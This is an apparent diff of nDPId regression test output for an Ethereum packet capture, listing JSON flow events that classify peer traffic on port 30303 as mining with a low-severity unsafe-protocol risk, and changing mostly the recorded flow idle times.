+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
